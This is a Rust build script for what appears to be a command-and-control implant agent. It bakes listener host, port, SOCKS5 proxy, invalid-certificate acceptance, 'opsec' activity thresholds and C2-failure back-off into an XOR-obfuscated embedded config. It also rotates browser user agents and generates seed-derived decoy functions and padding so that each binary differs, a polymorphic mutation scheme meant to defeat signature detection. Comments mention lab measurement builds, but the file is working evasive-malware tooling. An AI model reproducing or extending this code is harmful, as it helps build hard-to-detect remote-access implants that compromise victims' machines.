use std::env;
use std::fs;
use std::path::{Path, PathBuf};

fn log_build(msg: &str) {
    println!("[BUILD] {}", msg);
}

// --- Seeded source mutation engine (issue #67, R1 milestone 0) ---
// All mutation decisions in a build derive from MUTATION_SEED (hex u64) via
// this PRNG, so any payload is reproducible from (source revision, seed).

// Fixed fallback used for manual builds that do not set MUTATION_SEED.
const DEV_MUTATION_SEED: u64 = 0x4d69_6372_6f43_3200;

// Hand-rolled splitmix64 PRNG; no external dependencies in the build script.
struct SplitMix64 {
    state: u64,
}

impl SplitMix64 {
    fn new(seed: u64) -> Self {
        Self { state: seed }
    }

    fn next_u64(&mut self) -> u64 {
        self.state = self.state.wrapping_add(0x9E37_79B9_7F4A_7C15);
        let mut z = self.state;
        z = (z ^ (z >> 30)).wrapping_mul(0xBF58_476D_1CE4_E5B9);
        z = (z ^ (z >> 27)).wrapping_mul(0x94D0_49BB_1331_11EB);
        z ^ (z >> 31)
    }

    fn below(&mut self, n: u64) -> u64 {
        self.next_u64() % n
    }

    // Random lowercase alphanumeric string of the given length.
    fn alnum(&mut self, len: usize) -> String {
        const CHARSET: &[u8] = b"abcdefghijklmnopqrstuvwxyz0123456789";
        (0..len)
            .map(|_| CHARSET[self.below(CHARSET.len() as u64) as usize] as char)
            .collect()
    }
}

// Curated user-agent pool; one is selected per seed and embedded in the config.
const USER_AGENT_POOL: &[&str] = &[
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36",
];

fn resolve_mutation_seed() -> (u64, bool) {
    match env::var("MUTATION_SEED") {
        Ok(raw) => {
            let trimmed = raw.trim().trim_start_matches("0x");
            match u64::from_str_radix(trimmed, 16) {
                Ok(seed) => (seed, true),
                Err(_) => {
                    println!(
                        "cargo:warning=Invalid MUTATION_SEED '{}', falling back to fixed dev seed",
                        raw
                    );
                    (DEV_MUTATION_SEED, false)
                }
            }
        }
        Err(_) => (DEV_MUTATION_SEED, false),
    }
}

// Generate OUT_DIR/mutation.rs: seed-derived decoy functions, random string
// constants and a random-length padding blob. The agent references
// mutation_entry() once via std::hint::black_box so LLVM keeps everything.
fn generate_mutation_module(rng: &mut SplitMix64, out_dir: &Path) {
    let decoy_count = 2 + rng.below(4) as usize; // 2..=5 decoy functions
    let padding_len = 64 + rng.below(449) as usize; // 64..=511 bytes

    let mut code = String::new();
    code.push_str("// Generated by build.rs from MUTATION_SEED. Do not edit.\n");

    // Random-length padding blob, unique per seed.
    code.push_str(&format!(
        "pub const MUTATION_PADDING: [u8; {}] = [\n    ",
        padding_len
    ));
    let padding: Vec<String> = (0..padding_len)
        .map(|_| format!("0x{:02x}", rng.next_u64() as u8))
        .collect();
    code.push_str(&padding.join(", "));
    code.push_str("\n];\n\n");

    // Random string constants.
    for i in 0..3 {
        let len = 16 + rng.below(33) as usize; // 16..=48 chars
        code.push_str(&format!(
            "pub const DECOY_STR_{}: &str = \"{}\";\n",
            i,
            rng.alnum(len)
        ));
    }
    code.push('\n');

    // Decoy functions with seed-derived arithmetic.
    let mut decoy_names = Vec::new();
    for _ in 0..decoy_count {
        let name = format!("decoy_{:08x}", rng.next_u64() as u32);
        let multiplier = rng.next_u64() | 1; // odd multiplier
        let mask = rng.next_u64();
        code.push_str(&format!(
            "#[inline(never)]\nfn {}(x: u64) -> u64 {{\n    (x.wrapping_mul(0x{:016x})) ^ 0x{:016x}\n}}\n\n",
            name, multiplier, mask
        ));
        decoy_names.push(name);
    }

    // Entry point folding all artifacts into one value so nothing is stripped.
    code.push_str(
        "pub fn mutation_entry() -> u64 {\n    let mut acc = MUTATION_PADDING[0] as u64;\n",
    );
    code.push_str(
        "    for (i, b) in MUTATION_PADDING.iter().enumerate() {\n        acc = acc.wrapping_add((*b as u64).wrapping_mul(i as u64 + 1));\n    }\n",
    );
    for i in 0..3 {
        code.push_str(&format!(
            "    acc ^= DECOY_STR_{}.as_bytes().iter().fold(0u64, |a, b| a.wrapping_mul(31).wrapping_add(*b as u64));\n",
            i
        ));
    }
    for name in &decoy_names {
        code.push_str(&format!("    acc = {}(acc);\n", name));
    }
    code.push_str("    acc\n}\n");

    let dest = out_dir.join("mutation.rs");
    if let Err(e) = fs::write(&dest, code) {
        panic!("Failed to write mutation.rs: {}", e);
    }
    log_build(&format!("Wrote mutation module to {:?}", dest));
}

fn main() {
    log_build("Build script started");
    println!("cargo:rerun-if-changed=build.rs");
    println!("cargo:rerun-if-changed=config.json");
    println!("cargo:rerun-if-env-changed=LISTENER_HOST");
    println!("cargo:rerun-if-env-changed=LISTENER_PORT");
    println!("cargo:rerun-if-env-changed=LISTENER_ID");
    println!("cargo:rerun-if-env-changed=SLEEP_INTERVAL");
    println!("cargo:rerun-if-env-changed=PAYLOAD_ID");
    println!("cargo:rerun-if-env-changed=PROTOCOL");
    println!("cargo:rerun-if-env-changed=SOCKS5_ENABLED");
    println!("cargo:rerun-if-env-changed=SOCKS5_HOST");
    println!("cargo:rerun-if-env-changed=SOCKS5_PORT");
    println!("cargo:rerun-if-env-changed=ALLOW_INVALID_CERTS");
    println!("cargo:rerun-if-env-changed=BASE_MAX_C2_FAILS");
    println!("cargo:rerun-if-env-changed=C2_THRESH_INC_FACTOR");
    println!("cargo:rerun-if-env-changed=C2_THRESH_DEC_FACTOR");
    println!("cargo:rerun-if-env-changed=C2_THRESH_ADJ_INTERVAL");
    println!("cargo:rerun-if-env-changed=C2_THRESH_MAX_MULT");
    println!("cargo:rerun-if-env-changed=PROC_SCAN_INTERVAL_SECS");
    println!("cargo:rerun-if-env-changed=BASE_SCORE_THRESHOLD_BG_TO_REDUCED");
    println!("cargo:rerun-if-env-changed=BASE_SCORE_THRESHOLD_REDUCED_TO_FULL");
    println!("cargo:rerun-if-env-changed=REDUCED_ACTIVITY_SLEEP_SECS");
    println!("cargo:rerun-if-env-changed=MUTATION_SEED");

    // Resolve the mutation seed; server-driven builds always set it, manual
    // builds fall back to a fixed dev seed so existing fixtures keep working.
    let (mutation_seed, seed_from_env) = resolve_mutation_seed();
    if !seed_from_env {
        println!(
            "cargo:warning=MUTATION_SEED not set; using fixed dev seed {:016x} (not for lab measurement builds)",
            DEV_MUTATION_SEED
        );
    }
    log_build(&format!("MUTATION_SEED: {:016x}", mutation_seed));
    // Let the agent binary report its own seed at runtime.
    println!("cargo:rustc-env=MUTATION_SEED_USED={:016x}", mutation_seed);

    let mut rng = SplitMix64::new(mutation_seed);
    // Seed-derived random config XOR key (16 bytes, hex-encoded) replacing the
    // previous payload_id-derived key, which was known to the server.
    let mut xor_key_bytes = [0u8; 16];
    for chunk in xor_key_bytes.chunks_mut(8) {
        chunk.copy_from_slice(&rng.next_u64().to_le_bytes());
    }
    let xor_key = xor_key_bytes
        .iter()
        .map(|b| format!("{:02x}", b))
        .collect::<String>();
    // Seed-selected user-agent and randomized endpoint path segments. The path
    // segments are recorded in the config for the Phase 2 transport profiles;
    // the v0 agent keeps using the fixed routes.
    let user_agent = USER_AGENT_POOL[rng.below(USER_AGENT_POOL.len() as u64) as usize];
    let endpoint_segments: Vec<String> = (0..2).map(|_| rng.alnum(8)).collect();

    // Get configuration from environment variables
    let server_host = env::var("LISTENER_HOST").unwrap_or_default();
    let server_port = env::var("LISTENER_PORT").unwrap_or_default();
    let listener_id = env::var("LISTENER_ID").unwrap_or_default();
    let sleep_interval = env::var("SLEEP_INTERVAL").unwrap_or_else(|_| "60".to_string());
    let payload_id = env::var("PAYLOAD_ID").unwrap_or_default();
    let protocol = env::var("PROTOCOL").unwrap_or_else(|_| {
        if server_port == "443" {
            "https".to_string()
        } else {
            "http".to_string()
        }
    });
    let socks5_enabled = env::var("SOCKS5_ENABLED")
        .unwrap_or_else(|_| "false".to_string())
        .parse::<bool>()
        .unwrap_or(false);
    let socks5_host = env::var("SOCKS5_HOST").unwrap_or_else(|_| "127.0.0.1".to_string());
    let socks5_port = env::var("SOCKS5_PORT").unwrap_or_else(|_| "9050".to_string());
    let allow_invalid_certs = env::var("ALLOW_INVALID_CERTS")
        .unwrap_or_else(|_| "false".to_string())
        .parse::<bool>()
        .unwrap_or(false);

    log_build(&format!("LISTENER_HOST: {}", server_host));
    log_build(&format!("LISTENER_PORT: {}", server_port));
    log_build(&format!("LISTENER_ID: {}", listener_id));
    log_build(&format!("SLEEP_INTERVAL: {}", sleep_interval));
    log_build(&format!("PAYLOAD_ID: {}", payload_id));
    log_build(&format!("PROTOCOL: {}", protocol));
    log_build(&format!("SOCKS5_ENABLED: {}", socks5_enabled));
    log_build(&format!("SOCKS5_HOST: {}", socks5_host));
    log_build(&format!("SOCKS5_PORT: {}", socks5_port));
    log_build(&format!("ALLOW_INVALID_CERTS: {}", allow_invalid_certs));

    // Only use environment config if we have all required values
    let config_content = if !server_host.is_empty()
        && !server_port.is_empty()
        && !payload_id.is_empty()
    {
        log_build("Using environment variables for config");
        let base_score_bg_reduced_thresh =
            env::var("BASE_SCORE_THRESHOLD_BG_TO_REDUCED").unwrap_or_else(|_| "20.0".to_string());
        let base_score_reduced_full_thresh =
            env::var("BASE_SCORE_THRESHOLD_REDUCED_TO_FULL").unwrap_or_else(|_| "60.0".to_string());
        let min_full_opsec = env::var("MIN_FULL_OPSEC_SECS").unwrap_or_else(|_| "300".to_string());
        let min_bg_opsec = env::var("MIN_BG_OPSEC_SECS").unwrap_or_else(|_| "60".to_string());
        let base_max_c2_fails = env::var("BASE_MAX_C2_FAILS").unwrap_or_else(|_| "5".to_string());
        let min_reduced_opsec =
            env::var("MIN_REDUCED_OPSEC_SECS").unwrap_or_else(|_| "120".to_string());
        let reduced_activity_sleep =
            env::var("REDUCED_ACTIVITY_SLEEP_SECS").unwrap_or_else(|_| "120".to_string());
        let c2_inc_factor = env::var("C2_THRESH_INC_FACTOR").unwrap_or_else(|_| "1.1".to_string());
        let c2_dec_factor = env::var("C2_THRESH_DEC_FACTOR").unwrap_or_else(|_| "0.9".to_string());
        let c2_adj_interval =
            env::var("C2_THRESH_ADJ_INTERVAL").unwrap_or_else(|_| "3600".to_string());
        let c2_max_mult = env::var("C2_THRESH_MAX_MULT").unwrap_or_else(|_| "2.0".to_string());
        let proc_scan_interval =
            env::var("PROC_SCAN_INTERVAL_SECS").unwrap_or_else(|_| "300".to_string());

        format!(
            r#"{{
                "server_url": "{}:{}",
                "sleep_interval": {},
                "jitter": 2,
                "payload_id": "{}",
                "agent_id": "",
                "listener_id": "{}",
                "protocol": "{}",
                "user_agent": "{}",
                "mutation_seed": "{:016x}",
                "mutation_endpoint_segments": ["{}", "{}"],
                "socks5_enabled": {},
                "socks5_host": "{}",
                "socks5_port": {},
                "allow_invalid_certs": {},
                "base_score_threshold_bg_to_reduced": {},
                "base_score_threshold_reduced_to_full": {},
                "min_duration_full_opsec_secs": {},
                "min_duration_background_opsec_secs": {},
                "base_max_consecutive_c2_failures": {},
                "min_duration_reduced_activity_secs": {},
                "reduced_activity_sleep_secs": {},
                "c2_failure_threshold_increase_factor": {},
                "c2_failure_threshold_decrease_factor": {},
                "c2_threshold_adjust_interval_secs": {},
                "c2_dynamic_threshold_max_multiplier": {},
                "proc_scan_interval_secs": {}
            }}"#,
            server_host,
            server_port,
            sleep_interval,
            payload_id,
            listener_id,
            protocol,
            user_agent,
            mutation_seed,
            endpoint_segments[0],
            endpoint_segments[1],
            socks5_enabled,
            socks5_host,
            socks5_port,
            allow_invalid_certs,
            base_score_bg_reduced_thresh,
            base_score_reduced_full_thresh,
            min_full_opsec,
            min_bg_opsec,
            base_max_c2_fails,
            min_reduced_opsec,
            reduced_activity_sleep,
            c2_inc_factor,
            c2_dec_factor,
            c2_adj_interval,
            c2_max_mult,
            proc_scan_interval
        )
    } else if let Ok(content) = fs::read_to_string("config.json") {
        log_build("Using config.json file for config");
        // We assume config.json contains the new fields if needed,
        // otherwise serde(default) in AgentConfig will handle it.
        content
    } else {
        log_build("No valid config found, using default embedded config");
        // Update the hardcoded fallback JSON
        r#"{
            "server_url": "",
            "sleep_interval": 5,
            "jitter": 2,
            "payload_id": "",
            "agent_id": "",
            "listener_id": "",
            "protocol": "http",
            "socks5_enabled": false,
            "socks5_host": "127.0.0.1",
            "socks5_port": 9050,
            "allow_invalid_certs": false,
            "base_score_threshold_bg_to_reduced": 20.0,
            "base_score_threshold_reduced_to_full": 60.0,
            "min_duration_full_opsec_secs": 300,
            "min_duration_background_opsec_secs": 60,
            "base_max_consecutive_c2_failures": 5,
            "min_duration_reduced_activity_secs": 120,
            "reduced_activity_sleep_secs": 120,
            "c2_failure_threshold_increase_factor": 1.0,
            "c2_failure_threshold_decrease_factor": 1.0,
            "c2_threshold_adjust_interval_secs": {},
            "c2_dynamic_threshold_max_multiplier": 1.0
        }"#
        .replace("{}", &u64::MAX.to_string())
        .to_string()
    };

    // Generate Rust code with the embedded config
    let out_dir: PathBuf = match env::var_os("OUT_DIR") {
        Some(value) => value.into(),
        None => {
            log_build("OUT_DIR is not set; cannot write generated config");
            return;
        }
    };
    let dest_path = out_dir.join("config.rs");
    log_build(&format!("Writing embedded config to {:?}", dest_path));

    // XOR-obfuscate the config with the seed-derived random key. The const
    // interface consumed by src/config.rs is unchanged.
    let mut obfuscated_config_bytes = config_content.as_bytes().to_vec();
    for (i, byte) in obfuscated_config_bytes.iter_mut().enumerate() {
        *byte ^= xor_key.as_bytes()[i % xor_key.len()];
    }
    let hex_obfuscated_config = obfuscated_config_bytes
        .iter()
        .map(|b| format!("{:02x}", b))
        .collect::<String>();
    let config_code = format!(
        r###"pub const EMBEDDED_CONFIG_HEX: &str = r#"{}"#;
            pub const EMBEDDED_CONFIG_XOR_KEY: &str = r#"{}"#; // Seed-derived random key
            "###,
        hex_obfuscated_config, xor_key
    );
    if let Err(e) = fs::write(&dest_path, config_code) {
        log_build(&format!("Failed to write config.rs: {}", e));
        panic!("Failed to write config.rs: {}", e);
    } else {
        log_build("Embedded config written successfully with seed-derived XOR key.");
    }

    // Emit the seed-derived junk-code module alongside the config.
    generate_mutation_module(&mut rng, &out_dir);
}
